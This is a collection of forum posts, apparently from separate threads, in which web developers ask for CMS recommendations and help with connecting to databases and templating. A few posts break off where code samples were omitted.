Are there any leading candidates for not-obscenely-expensive CMSs for those stuck in a Microsoft shop (ASP and SQL server)?
We have a fair amount of dynamic content, require some sort of approval chain for updates and complete control over the layout. We were looking at RedDot, but the price is busting that deal. My eyes are bleeding from looking at all of the little one off shops that offer, well, not much. Does anyone have any experience with any products that they would recommend?

I run a mixed content website with a couple of my friends.  One of those friends knows html and some basic php.  I know html and some basic php and some css.  The third friend knows nothing.

I'm looking for a CMS that we can use to update our site.

That's our site, as you can see we have articles, videos, etc.  I'm just looking for a way to make posts on the front page a lot easier.  As of now, I have to edit four files just to put it up there and archive it.  I can't use just a regular blogging cms because the format of the site isn't exactly a blog.  Anyone have any suggestions?

So I'm in the process of redesigning and redeveloping my site, and I've thought about using a CMS, simply because I thought it would make life a little easier. I've been checking out a few solutions via http://www.opensourcecms.com/.

My only concerns are that:

• there's different kinds of sections, eg. news, articles, downloads (w/ screenshots, descriptions etc.), movies, and very soon an online portfolio


• I would like to keep the current directory structure, where programs, movies etc. are in a separate folder on the server.

I don't know why I never thought to do it before, but I put some benchmarking code into my CMS project today (PluggedOut CMS) - and was somewhat astounded at how quickly it's throwing pages back at me.

For an "un-cached" page, it's throwing things back in around 0.004 seconds, which I thought was damn fast... but get this - if I cache the page (so it doesn't have to bother building it from templates etc...) - it took just under 0.0004 seconds on average.

I don't know of a better advert for Linux, Apache, MySQL, and PHP quite frankly.

For those interested, the testing is on a Athlon 64 3200 (2.8Ghz), with 1Gb RAM, and a 160Gb HDD. It has Mandrake X64 on it.

Hey everybody. I hope there are some smart database people out there to make up for my lack of knowledge.

Anyway, I have a (hopefully) rather simple question.

I work at the local university maintaining the webpage for the nursing program here. The ladys I work for are not very computer smart, so I'm trying to develop an easier way for them to upload new data to class pages, new homework assignments, new lecture slides, etc etc etc. Basically a kind of micro-cms system.

Yes, I'm reinventing the wheel, but I feel it will be a good experience for me.

Well, I'm using .NET for this (C#) because of what's available here at school, and while in the end, everything will be on the SQL Server, for development purposes the webmaster for the school has said that I need to use MS Access.

Blech. Hopefully I won't have to change a whole lot of stuff for the migration to happen, but for now I'm stuck.

Unfortunately, while I can figure out the Queries and the basic commands, actually connecting to a MS Access database is proving to be rather difficult for me. I cannot seem to find an authoratative guide on what all I need to put to create the connect.

Most of the functions are going to be located in a seperate file, and once its all compiled, it should (hopefully) work. But I cannot seem to find what the connect string is.

In my databaseConnect() function I have this:

Hey all,

I've been brushing up my rusty skills lately while working on a few side project websites. I had a few questions regarding publishing platforms and CMS's. I know a few adopt the technique to style and present via CSS then use a backend management system to manage the content. I see many sites using Movable Type and Wordpress for this and some coding their own CMS's. I'd like to be able to style up the site and structure it however I like, but then have some type of backend to power it all yet be easy to integrate.

• I was wondering if anyone had any recommendations for either or perhaps another easy to implement Publishing Platform/CMS to drop into small-medium size web projects? Which one is easier to integrate into a design from scratch and a rich feature set to maintain?



• Another question, anyone know of an open-source equal to something like Basecamp?

• Reading up on each I've gathered a whole slew of new knowledge. One of the main differences I see now is WordPress' "Template Tags" aren't much more than PHP function calls and Movable Type have a full blown tag system. I am mainly looking at each system now based on their template systems and the template tags ease of use from the stand point of integrating your own desgin into it or creating a site from scratch with it built in. If anyone has switched from one system to the other I would love to hear your thoughts on why and how it worked out for you.

I know, another "what CMS should I use?" question. But hear me out. I'm looking for a CMS that's flexible, easy to set up, allows all users to submit content, and has some sort of mechanism for reviewing items (like Epinions or Amazon or Yelp.)

I can run PHP (safe mode only) or Perl, and I've got a MySQL database.

I wrote this blog post about how I hate blogs (ironic?). It was a little more than that, I was actually talking/thinking about how a lot of content is put into a blogging format... content that could be best delivered other ways.

Very cheeky of me, having only just joined this community, but may I post an awkward question?

In a CMS-like environment, I have a list of items that is generated on the serverside using an XmlDocument to throw together XHTML tags (mainly because it's substantially easier than using a Repeater, but the why is a moot point as the project doesn't have the budget for me to change that).

Now I have a requirement to add a new list item at the end of each list that is an "Add new item" form. It's very easy for me to write a UserControl to handle this form action, but would be relatively difficult to write this form bit as XmlElements to add into the exsiting XmlNode tree.

Is there a way for me to get the output of the server control as an XmlNode and squish that into my XmlNode tree?

Effectively, I want to take my existing code and making it look something like this:

So I am about to start building a web site/application and I realized that using some form of platform would make my life easier. I have looked at XOOPS as well as ampoliros, Has anyone used these who would like to comment on what they are like to work in. Or if you have another CMS that you like please say something.

Also Both seem to spend a lot of time showing you how to use an existing module but in neither case could I find anything on how to build your own database drivien components in them.
